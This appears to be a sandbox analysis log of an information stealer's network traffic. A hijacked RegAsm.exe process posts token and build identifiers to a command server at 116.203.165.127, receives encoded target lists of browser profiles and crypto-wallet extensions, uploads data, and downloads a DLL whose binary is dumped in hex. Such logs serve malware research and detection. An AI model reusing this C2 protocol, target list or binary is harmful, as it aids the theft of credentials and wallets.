                                                                                                                                                                                                                                2024-09-21 11:34:47 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                13192.168.2.949765116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:34:49 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHI
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:34:49 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------HJEHIJEBKEBFBFHIIDHICont
                                                                                                                                                                                                                                2024-09-21 11:34:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:49 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:34:50 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                14192.168.2.949766116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:34:51 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGH
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 332
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:34:51 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------DBFHDHJKKJDHJJJJKEGHCont
                                                                                                                                                                                                                                2024-09-21 11:34:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:51 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:34:51 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                15192.168.2.949768116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:34:55 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KKKJKEBKFCAAECAAAAAE
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 8061
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:34:55 UTC8061OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------KKKJKEBKFCAAECAAAAAEContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------KKKJKEBKFCAAECAAAAAEContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------KKKJKEBKFCAAECAAAAAECont
                                                                                                                                                                                                                                2024-09-21 11:34:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:56 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:34:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                16192.168.2.949769116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:34:56 UTC196OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:34:57 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:56 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 2459136
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Last-Modified: Saturday, 21-Sep-2024 11:34:56 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-09-21 11:34:57 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                2024-09-21 11:34:57 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                                                2024-09-21 11:34:57 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                                                                                                                                                                Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                                                                                                                                                2024-09-21 11:34:57 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                                                                                                                                                                Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                                                2024-09-21 11:34:57 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                                                                                                                                                                Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                                                                2024-09-21 11:34:57 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                2024-09-21 11:34:57 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                2024-09-21 11:34:57 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                                                                                                                                                Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                                                                2024-09-21 11:34:57 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                                                                                                                                                Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                                2024-09-21 11:34:57 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                                                                                                                                                Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                17192.168.2.949772116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:00 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAF
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 829
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
